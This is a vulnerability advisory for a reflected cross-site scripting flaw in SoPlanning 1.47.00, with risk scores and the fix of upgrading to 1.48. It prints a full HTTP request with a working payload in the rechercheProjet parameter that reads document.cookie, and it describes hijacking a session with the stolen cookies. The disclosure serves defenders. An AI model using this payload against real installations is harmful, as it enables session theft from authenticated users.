Modern applications typically rely on user input to provide the required functionality to the user. In doing so, the application accepts data from an untrusted source. In some circumstances, this data is processed and output to the end user. In other cases, this data is stored by the application for retrieval at a later stage, or for the viewing of other application users or passing onto other services in order to carry out the user request. Cross-Site Scripting is a vulnerability resulting from the lack of or inadequate sanitisation carried out on user supplied data which is then later rendered back to a user.
A variation of Cross-Site Scripting exists which stores the payload in the application which is executed every time the vulnerable parameter is rendered, this is known as stored Cross-Site Scripting.
SoPlanning v1.47.00 was vulnerable to a reflected Cross-Site Scripting vulnerability.
GET /soplanning/www/groupe_list.php?statut%5B%5D=todo&statut%5B%5D=progress&statut%5B%5D=done&statut%5B%5D=abort&statut%5B%5D=archive&rechercheProjet=test%22onmouseover=confirm(document.cookie)%3E%3C/div%3E%3C/div%3EX%3C!-- HTTP/1.1 Host: 192.168.0.88 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: dateDebut=03/09/2020; dateFin=03/11/2020; xposJoursWin=0; xposMoisWin=0; yposJoursWin=0; yposMoisWin=0; soplanningplanning_=r22g78taga3ok7tg3d5l03434n; baseColonne=jours; baseLigne=projets; dimensionCase=reduit Connection: close
Figure 1 – Authenticated User Cookies
The following was the response which showed the XSS payload rendered in the document:
Independently, this vulnerability would allow an attacker to steal the session cookies for an authenticated user which would grant them the same access as the target user. This was verified through using the extracted session cookies in a different browser. It could also be used to load and execute malicious code within the application or simply be used to target the user’s browser.
Risk Category: High
CVSSv2: 8.5 A V:N/AC:M/Au:S/C:C/I:C/A:C
CVSSv3: 8.0 AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
SOPlannning version 1.47 and lower
Update to SOPlannning Version 1.48